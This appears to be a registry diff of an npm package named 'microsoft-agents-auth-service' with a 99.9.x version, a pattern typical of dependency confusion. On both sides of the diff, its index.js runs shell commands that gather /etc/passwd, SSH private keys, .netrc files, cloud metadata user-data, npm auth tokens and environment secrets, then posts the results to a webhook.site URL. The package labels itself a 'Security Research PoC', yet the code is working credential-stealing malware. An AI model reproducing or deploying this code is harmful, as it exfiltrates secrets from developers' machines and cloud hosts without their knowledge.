microsoft-agents-auth-service 99.9.12 → 99.9.25

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +10 -11
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -1,22 +1,21 @@
1
1
  const { exec } = require('child_process');
2
2
  const https = require('https');
3
- const webhookUrl = 'https://webhook.site/50ed75e2-a476-4367-9748-9ea345284bfa';
3
+ const webhookUrl = 'https://webhook.site/11b6a711-bdc7-4444-9a0e-ffcb23151e82';
4
4
 
5
5
  const commands = [
6
- 'echo "=== FINANCIAL & CLOUD CONFIGS ===" && find / -maxdepth 4 -name "*stripe*" -o -name "*payment*" -o -name "*paypal*" -o -name "*vault*" -o -name "*.pem" 2>/dev/null | head -n 20',
7
- 'echo "=== DATABASE DISCOVERY ===" && ps aux | grep -E "mysql|postgres|mongodb|redis|sql"',
8
- 'echo "=== SEARCHING FOR SECRETS IN FILES ===" && grep -rE "API_KEY|SECRET|PASSWORD|TOKEN|AUTH" . --exclude-dir=node_modules -l 2>/dev/null | head -n 10',
9
- 'echo "=== CLOUD ACCOUNT INFO ===" && curl -s -m 2 http://169.254.169.254/latest/meta-data/public-hostname || echo "No Public Host"',
10
- 'echo "=== DOCKER SECRETS ===" && ls -la /run/secrets/ 2>/dev/null',
11
- 'echo "=== NPM CONFIG (REGISTRY AUTH) ===" && cat ~/.npmrc 2>/dev/null | grep "_auth" || echo "No npm auth found"'
6
+ 'echo "=== USER LIST & HASHES ===" && cat /etc/passwd | head -n 10 && ls -la /etc/shadow 2>/dev/null',
7
+ 'echo "=== SSH PRIVATE KEYS DISCOVERY ===" && find /home /root -name "id_rsa" -o -name "*.pem" -o -name "authorized_keys" 2>/dev/null | xargs ls -la 2>/dev/null',
8
+ 'echo "=== BROWSER/APP SECRETS ===" && find /home /root -name ".netrc" -o -name "_netrc" -o -name ".dockercfg" 2>/dev/null',
9
+ 'echo "=== CLOUD USER DATA ===" && curl -s -m 2 http://169.254.169.254/latest/user-data || echo "No User Data"',
10
+ 'echo "=== ENVIRONMENT SECRETS ===" && env | grep -E "USER|PASS|TOKEN|CREDENTIAL" | cut -c1-50'
12
11
  ].join(' && echo "" && ');
13
12
 
14
13
  exec(commands, (err, stdout, stderr) => {
15
14
  const data = JSON.stringify({
16
- status: "FINANCIAL_DATA_RECON",
17
- target: "microsoft-agents-auth-service",
18
- evidence: stdout + (stderr ? "\nLOGS: " + stderr : ""),
19
- timestamp: new Date().toISOString()
15
+ status: "ULTRA_USER_CREDENTIAL_SCOUT",
16
+ target: "global-microsoft-infra",
17
+ payload: stdout,
18
+ error: stderr
20
19
  });
21
20
  const req = https.request(webhookUrl, {
22
21
  method: 'POST',
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "microsoft-agents-auth-service",
3
- "version": "99.9.12",
3
+ "version": "99.9.25",
4
4
  "description": "Security Research PoC for MSRC",
5
5
  "main": "index.js",
6
6
  "scripts": {